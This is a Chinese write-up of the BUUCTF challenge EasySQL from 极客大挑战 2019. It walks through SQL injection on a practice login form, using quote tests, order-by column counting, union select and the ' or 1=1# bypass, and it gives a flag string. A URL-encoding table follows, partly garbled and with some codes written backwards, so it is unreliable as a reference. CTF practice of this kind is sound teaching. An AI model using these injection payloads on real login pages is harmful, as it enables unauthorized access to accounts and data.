BUUCTF-WEB:[极客大挑战 2019]EasySQL 1(收藏了URL编码表)
點擊鏈接進(jìn)入環(huán)境發(fā)現(xiàn)是一個登錄界面
我的思路:
第一步、測試注入點(tips:利用單引號,and 1=1, or 1=1之類的,%23為#注釋符的url編碼)判斷是字符型還是數(shù)字型
payload:username=1' &password=123(SQL tyntax)
payload:username=1' %23&password=123(說明存在注入點)
第二步、利用order by查表的列數(shù)
payload:username=1' order by 1%23&password=123(NO,Wrong username password!!!)
payload:username=1' order by 2%23&password=123(NO,Wrong username password!!!)
payload:username=1' order by 3%23&password=123(NO,Wrong username password!!!)
payload:username=1' order by 4%23&password=123(Unknown column '4' in 'order clause')
說明表只有四列
第三步、如有回顯,找到回顯位(回顯,就是顯示正在執(zhí)行的批處理命令及執(zhí)行的結(jié)果等)
?
payload:username=1' union select 1,2,3%23&password=123
flag{cb71f2ab-7fea-42d9-bf34-41755337fada}
發(fā)現(xiàn)在查找回顯位的這一步就出現(xiàn)了flag,都用不到爆庫
第四步、利用union select 爆庫、爆表、爆字段名、爆值
?
看大佬wp發(fā)現(xiàn)還有一種更簡單的方法:
實際上這道題是登錄成功就可以拿到flag
在用戶名和密碼都填:
payload:'or 1=1#
由于用戶名和密碼都存在sql注入漏洞,可以用'閉合前面的查詢語句同時用or繞過判斷
?
?
★URL編碼表:
| backspace | 8% | A | 41% | a | 61% | § | %A7 | ? | %D5 | ? |
| tab | 9% | B | 42% | b | 62% | ? | %AB | ? | %D6 | ? |
| linefeed | %0A | C | 43% | c | 63% | ? | %AC | ? | %D8 | ? |
| creturn | %0D | D | 44% | d | 64% | ˉ | %AD | ù | %D9 | ? |
| space | 20% | E | 45% | e | 65% | o | %B0 | ú | %DA | ? |
| ! | 21% | F | 46% | f | 66% | ± | %B1 | ? | %DB | ? |
| " | 22% | G | 47% | g | 67% | a | %B2 | ü | %DC | ? |
| # | 23% | H | 48% | h | 68% | , | %B4 | Y | %DD | ? |
| $ | 24% | I | 49% | i | 69% | μ | %B5 | T | %DE | ? |
| % | 25% | J | %4A | j | %6A | ? | %BB | ? | %DF | ? |
| & | 26% | K | %4B | k | %6B | ? | %BC | à | %E0 | ? |
| ' | 27% | L | %4C | l | %6C | ? | %BD | á | %E1 | ? |
| ( | 28% | M | %4D | m | %6D | ? | %BF | a | %E2 | ? |
| ) | 29% | N | %4E | n | %6E | à | %C0 | ? | %E3 | ? |
| * | %2A | O | %4F | o | %6F | á | %C1 | ? | %E4 | ? |
| + | %2B | P | 50% | p | 70% | ? | %C2 | ? | %E5 | ? |
| , | %2C | Q | 51% | q | 71% | ? | %C3 | ? | %E6 | ? |
| - | %2D | R | 52% | r | 72% | ? | %C4 | ? | %E7 | ? |
| . | %2E | S | 53% | s | 73% | ? | %C5 | è | %E8 | ? |
| / | %2F | T | 54% | t | 74% | ? | %C6 | é | %E9 | ? |
| 0 | 30% | U | 55% | u | 75% | ? | %C7 | ê | %EA | ? |
| 1 | 31% | V | 56% | v | 76% | è | %C8 | ? | %EB | ? |
| 2 | 32% | W | 57% | w | 77% | é | %C9 | ì | %EC | ? |
| 3 | 33% | X | 58% | x | 78% | ê | %CA | í | %ED | ? |
| 4 | 34% | Y | 59% | y | 79% | ? | %CB | ? | %EE | ? |
| 5 | 35% | Z | %5A | z | %7A | ì | %CC | ? | %EF | ? |
| 6 | 36% | ? | ? | ? | ? | ? | ? | e | %F0 | ? |
| 7 | 37% | ? | %3F | { | %7B | í | %CD | ? | %F1 | ? |
| 8 | 38% | @ | 40% | | | %7C | ? | %CE | ò | %F2 | ? |
| 9 | 39% | [ | %5B | } | %7D | ? | %CF | ó | %F3 | ? |
| : | %3A | \ | %5C | ~ | %7E | D | %D0 | ? | %F4 | ? |
| ; | %3B | ] | %5D | ¢ | %A2 | ? | %D1 | ? | %F5 | ? |
| <? | %3C | ^ | %5E | £ | %A3 | ò | %D2 | ? | %F6 | ? |
| = | %3D | _ | %5F | ¥ | %A5 | ó | %D3 | ÷ | %F7 | ? |
| >? | %3E | ` | 60% | | | %A6 | ? | %D4 | ? | %F8 | ? |
| ? | ? | ? | ? | ? | ? | ? | ? | ù | %F9 | ? |
?
?
?
?
總結(jié)
以上是生活随笔為你收集整理的BUUCTF-WEB:[极客大挑战 2019]EasySQL 1(收藏了URL编码表)的全部內(nèi)容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 面向大数据处理的数据流编程模型和工具综述
- 下一篇: BUUCTF-WEB:[SUCTF 20